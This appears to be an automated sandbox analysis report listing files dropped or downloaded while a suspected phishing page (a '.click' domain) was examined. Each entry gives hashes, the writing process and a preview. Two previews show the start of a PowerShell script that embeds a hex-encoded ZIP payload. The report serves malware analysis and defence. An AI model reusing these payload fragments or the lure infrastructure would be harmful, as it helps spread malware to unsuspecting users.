                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):13139691
                                                                    Entropy (8bit):3.9704412281561168
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FDE0891F0DA40825DBAD756C9BD2E2A4
                                                                    SHA1:7A1D45097B24DE106623C86C5F2672A8EC745027
                                                                    SHA-256:5249D4637BB83FE40F675AE7B0849238A808BDDB597DC8405F1F60930E2C13C2
                                                                    SHA-512:05898FB519C6451F23D7A3F0735519E064E29E1B07B47BB8C38314C6A7A5CCD08D3C441D3C6805E0D3B511672FC22E71459536512B78F636CD1D4C1D9D98F1F3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:$hexData = '504b0304140000000800598fbb5a62cd563cdd39640004699c000b000000374f72636869642e70313284bc65505c41b7053a380cee2e33b8bb137c7087c1dddd5d020cee0caec11d0283bb43d0a0c121400642124290840449f2f27defdefbeb55bd75aafb749dea5f5d67afb5f6de552d23a3ad60a0aea3606368a46060242bfb77e7ef31804843455d0580828a0250fbf700feee039400d898ffc1bf191b0f1b0b1b8f00888d0d2420c2c727c0c72722c6fb2ffee7f5ff8dbf93005c6c946c147e141462c0df69002d00808a86828202f83fa0a002d0d03130b1feee01b0fffb1d4581498029ddd1367f8b0f6f1c00136a5e14dbb6e7a679376374f2d64d4d53b54be70b6f1ab7c6da47756d010bb51602e0663280c0917facc1ed751d8477bdb531b1d5b264dea0ce3e894b4d3c30a4c7b5b6412bafe9cb87e3d629d4ce39fa1c45f58bc01ca83bbf99a5be8930869f391a4a3a3583f134e9989fbc0bd4d470f1dcb8137b566d96e6409d42bdabd223ec1df0e00f0d0f893051bd024b16ea24bb9263e067ae0ae9f4b925b2f15a8c4e5475f955b38d81edca8cdc9546427b0e5bf2780375820c20bcaf8eedb102be00df05ce2502147851d0c9eda22dc5b5398f4ff1dd27e1ca3954e96666c969b8413edef13571999ae8ad6a6838a01c4c5e0a119a3e8bad868a37551fb6b9

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ll5lr3gm.1yt.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Tempy.ps1 (copy)

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):0
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FDE0891F0DA40825DBAD756C9BD2E2A4
                                                                    SHA1:7A1D45097B24DE106623C86C5F2672A8EC745027
                                                                    SHA-256:5249D4637BB83FE40F675AE7B0849238A808BDDB597DC8405F1F60930E2C13C2
                                                                    SHA-512:05898FB519C6451F23D7A3F0735519E064E29E1B07B47BB8C38314C6A7A5CCD08D3C441D3C6805E0D3B511672FC22E71459536512B78F636CD1D4C1D9D98F1F3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:$hexData = '504b0304140000000800598fbb5a62cd563cdd39640004699c000b000000374f72636869642e70313284bc65505c41b7053a380cee2e33b8bb137c7087c1dddd5d020cee0caec11d0283bb43d0a0c121400642124290840449f2f27defdefbeb55bd75aafb749dea5f5d67afb5f6de552d23a3ad60a0aea3606368a46060242bfb77e7ef31804843455d0580828a0250fbf700feee039400d898ffc1bf191b0f1b0b1b8f00888d0d2420c2c727c0c72722c6fb2ffee7f5ff8dbf93005c6c946c147e141462c0df69002d00808a86828202f83fa0a002d0d03130b1feee01b0fffb1d4581498029ddd1367f8b0f6f1c00136a5e14dbb6e7a679376374f2d64d4d53b54be70b6f1ab7c6da47756d010bb51602e0663280c0917facc1ed751d8477bdb531b1d5b264dea0ce3e894b4d3c30a4c7b5b6412bafe9cb87e3d629d4ce39fa1c45f58bc01ca83bbf99a5be8930869f391a4a3a3583f134e9989fbc0bd4d470f1dcb8137b566d96e6409d42bdabd223ec1df0e00f0d0f893051bd024b16ea24bb9263e067ae0ae9f4b925b2f15a8c4e5475f955b38d81edca8cdc9546427b0e5bf2780375820c20bcaf8eedb102be00df05ce2502147851d0c9eda22dc5b5398f4ff1dd27e1ca3954e96666c969b8413edef13571999ae8ad6a6838a01c4c5e0a119a3e8bad868a37551fb6b9

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):0
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E58EDDE69C91EE596560253653606165
                                                                    SHA1:FEB56A4E816A21BC627BD46C1CA56A91A81E0BC8
                                                                    SHA-256:2C90D7C9AFF503CB8464C44B5738C9DF15C6F908E01F0651C7F892CBD8916967
                                                                    SHA-512:E10326D46D0202FF80A66B2A9D3B4A447B0AA20730B692DE714CF23082E0479BF013F377D48D2D9B149DD41FA1EF35BD3805545323D574A229B5D322E8AC61D4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:...................................FL..................F.".. ......=...a9.|....z.:{.............................:..DG..Yr?.D..U..k0.&...&......7..=.....6]....A@%|........t...CFSF..1.....FW.Q..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.Q.Zwj....]......................0..A.p.p.D.a.t.a...B.V.1......Z{j..Roaming.@......FW.Q.Z{j....^......................PD.R.o.a.m.i.n.g.....\.1......Zxj..MICROS~1..D......FW.Q.Z.j...._.....................9...M.i.c.r.o.s.o.f.t.....V.1.....gZ.K..Windows.@......FW.Q.Zwj....a.....................'...W.i.n.d.o.w.s.......1.....FW.Q..STARTM~1..n......FW.Q.Zwj....o...............D........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.R..Programs..j......FW.Q.Zwj....r...............@.....e...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.QgZ.K....y.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.Q.Z.j................

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZVZKQI59UD2WCTU4EBTX.temp

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):6221
                                                                    Entropy (8bit):3.7352668482825373
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E58EDDE69C91EE596560253653606165
                                                                    SHA1:FEB56A4E816A21BC627BD46C1CA56A91A81E0BC8
                                                                    SHA-256:2C90D7C9AFF503CB8464C44B5738C9DF15C6F908E01F0651C7F892CBD8916967
                                                                    SHA-512:E10326D46D0202FF80A66B2A9D3B4A447B0AA20730B692DE714CF23082E0479BF013F377D48D2D9B149DD41FA1EF35BD3805545323D574A229B5D322E8AC61D4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:...................................FL..................F.".. ......=...a9.|....z.:{.............................:..DG..Yr?.D..U..k0.&...&......7..=.....6]....A@%|........t...CFSF..1.....FW.Q..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.Q.Zwj....]......................0..A.p.p.D.a.t.a...B.V.1......Z{j..Roaming.@......FW.Q.Z{j....^......................PD.R.o.a.m.i.n.g.....\.1......Zxj..MICROS~1..D......FW.Q.Z.j...._.....................9...M.i.c.r.o.s.o.f.t.....V.1.....gZ.K..Windows.@......FW.Q.Zwj....a.....................'...W.i.n.d.o.w.s.......1.....FW.Q..STARTM~1..n......FW.Q.Zwj....o...............D........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....FW.R..Programs..j......FW.Q.Zwj....r...............@.....e...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.QgZ.K....y.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.Q.Z.j................

                                                                    Chrome Cache Entry: 104

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):2228
                                                                    Entropy (8bit):7.82817506159911
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                    SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                    SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                    SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                    Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                                                                    Chrome Cache Entry: 107

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 87533
                                                                    Category:downloaded
                                                                    Size (bytes):30336
                                                                    Entropy (8bit):7.990122995670157
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:8EC8BBC7D71DF3C7FB8F0E287D4604E0
                                                                    SHA1:F5CDED96FEDC4194CC96A9D5DA8456E4B2C02F68
                                                                    SHA-256:9D53089B72D4828A1939167117DB78DD89806F5E0658357695D4094D340483B4
                                                                    SHA-512:D31EBBCC2B5658C2EEFF3090E42A02FD7F8EB75897CC8075C16363422193175766329D786D79495A3DA5FCF86B741A04E0782D0993B461205047D5C2BDB10F0A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://code.jquery.com/jquery-3.7.1.min.js
                                                                    Preview:............yw.F......"...&E:..;...G...$q.;.P..L6%...........W....r2...X..VW.^'.{G.~......G......G."8z...?_...7.2..<;...Q^]..h.gU...TyQR._.....8I...Jy.....6....RT.....%}.......U.E.Uwk......&....^...:/.r...p./6W2...5...a.jp...^]$.....(.7G."/|O....m.B.G..M.-..MR]....&..6EvD........\%.\z=.]..T...eR..D....8.e4.."z.#.^..".rT.j%b..rXb^...Wi\M.A..W.E.....2.t.*....O.RIQ......%.F....v...D.e.*.M....F..e\....kYTw".6...G...N R.Z....x.Q...ls.N....a./........uR....h.(.i/..e....e..(..Bl.{...F.,...h........w.S... Zd.=....M..E.v{.....+.<.....E...?......U..".+...h..IT..v.K..R...... 8>.e.H..-...XQ.-...t...p....i....y...mM...T.=/..r..Z.i6K.....g.y...T..h..it....|t.......t....9#.L*~.....Vu.z..Tf..G.%..[.[.L...5].........h.X...T.o.qv`.....T.1.H:s....*..:....5./..Y....4.|..!F.wmvzt..hX....6.B.!mz5.p$..).^.k.X.U....L`....X.F.P......>~...C.l......x.Q.Z....,.$.5t:..B.8..)..>..%V;!..eW/.J....9]..\f.q..o>z...&.m@..T.Tk.....1...i......F..VIQV.j...#*...........;BC.(

                                                                    Chrome Cache Entry: 108

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 207
                                                                    Category:downloaded
                                                                    Size (bytes):173
                                                                    Entropy (8bit):6.753851132198477
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:09B76FEC0A6398D4543898E842DD27D7
                                                                    SHA1:2247DC056F68EA8FD423DBB00BC48CB186852110
                                                                    SHA-256:593C9FDD08DBEABE419E008DC3DAA30246E318FC8DCD9AA255D0562FA5DF52ED
                                                                    SHA-512:BF1766525D688D51C6C133C813E1A2638A1A84DF872297796D87E0F2D77323E489DD8E7A4829A4B14394283CA440A1D09D2C61770BE5794AF8ECAF46CB1095EA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://confirm-id2719.click/Reservation_files/166939781.jpg
                                                                    Preview:..........M.;..0.D..b.@.RJ....Q 8..l>.Y.{...EC....V.F7H..E6..U....H\..bI...W'8...~ea...-.Q^..B.W.(4.q..c"..S...R.H.M..yBv..B..u..f8.k3.%...B.....+.0..3..[.y.|.........

                                                                    Chrome Cache Entry: 109

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 118085
                                                                    Category:downloaded
                                                                    Size (bytes):27077
                                                                    Entropy (8bit):7.990970434572831
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:60731C39329D94D3F2B4306F966B9686
                                                                    SHA1:0865BBFCE93A81B74AFCA98C762E5B3B8751B866
                                                                    SHA-256:2425180C2EE35BB69E602E86B2071C0F7E077F4D5CB8E1E2569681EA9F7A75BD
                                                                    SHA-512:A99BE5DEEBFCE9AE8DD7DD4E0033982648EE6E2D6F2A27A38782C54584B41DC0DBF8E538E97FCDC8B5DF8F5085F44A3E8247B9D4EEFBEC509DEC0D05DF4F046B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://confirm-id2719.click/
                                                                    Preview:...........I..G....n{.... ......f...."%&.*Of.<........".T.....}......X..53w...`..))8..ws..hw...d3.9.hqz|.,...tu|0....*.O_....b.,6G.d.Y.5...j.HW...z...^s....d.....3...Gqs...k<...8+.z>[..q:o.v.k.(..f...ec.4....g5........Pz.x....&...x..#.V.Yq.S...4..Z.>.x...X`s.L...tWgZM/h.9.d.....(.H..~.<~..|..h.>>p~X.....'I4...q>.'.HV.M....e..;xO-...&y.irM.9.$Z....^|...X.......f..~>..^9.dv|........`...p..\.h.Y$..0M_M...h..6.~..`...,.b.nN.+..8O..?.......8...2......,.....:]MO.....u.c.s..x...z.m.......*...Yt.[..Uq.O..t...".].oj._......7.zs.n..o.....G.W.&m,.M..-.|K.."]L.hV...M.,..as...Yr...u.oW..E3.H..;....y.J..z..'......6r..S..L.1n.........@i9.,W.2Ym...._..M2XDs.4{..<.....>...F_..f....N..1S.dS{.u0...S3.......9.t..%.h;.4.SR...|..Y...s..ai.e...r.m..`3-,..i.^......4.g..&:.V..vo.*..{@.F1I...4..i....`6=.l.g~k....Y#^.o.agw.$....v..Qw..a.3...V....~...Q;...@>a...;..v8...M..u}..Z{......u........@.*..*2..r.]F3....fK.g..6q......'..[.%...M..Uv>.m&......F_...b4..^..I...49_.

                                                                    Chrome Cache Entry: 116

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max compression, truncated
                                                                    Category:downloaded
                                                                    Size (bytes):44
                                                                    Entropy (8bit):4.70297224329311
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:ABD1424E68D1EBD3571DCECCB1DC3697
                                                                    SHA1:7E08C7A02EF325DF3D80BCEB8BF1EAFA26C7E179
                                                                    SHA-256:18DF3692F2A4A1969F5EC1D8635F72C64B996F993264A6A66C0639A4C3698D1E
                                                                    SHA-512:FC43B3D5BD9A7172CB36DBE323955AFFC1D661CDB2B06B630C54A5FD213A79564FCD2CD8D8CC68FD0ABBF99AFE7F26467E654671F084A18071C1639C09FB4776
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSdlgfoJ3vWEEgUNUopJoxIFDXk4iPchz2Mdu2E0hNY=?alt=proto
                                                                    Preview:..........s...v*7.....rOw..M.=...l[..~.)....

                                                                    Chrome Cache Entry: 123

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):153
                                                                    Entropy (8bit):4.599963902086101
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:221C5068A9B8ABADB65566698A2E54D2
                                                                    SHA1:2F61C62B38CBA22D7FC5311D02E34D0697A31845
                                                                    SHA-256:BFB286554B24DB87B6CBCB6E68BE23F89DEE1BE4D7DB544D1E7C97C45664E0DF
                                                                    SHA-512:FFDA24061CD9DCA9F6C2CAE0FF791C478B8B85840A7753E8EEDA4709BF80F7174FEE49C3BA7EF0BA615106981CF52362B1D5F9D90C1F580231DFC3BF22D1F69C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<!doctype html>.<html lang=en>.<title>405 Method Not Allowed</title>.<h1>Method Not Allowed</h1>.<p>The method is not allowed for the requested URL.</p>.

                                                                    Static File Info

                                                                    No static file info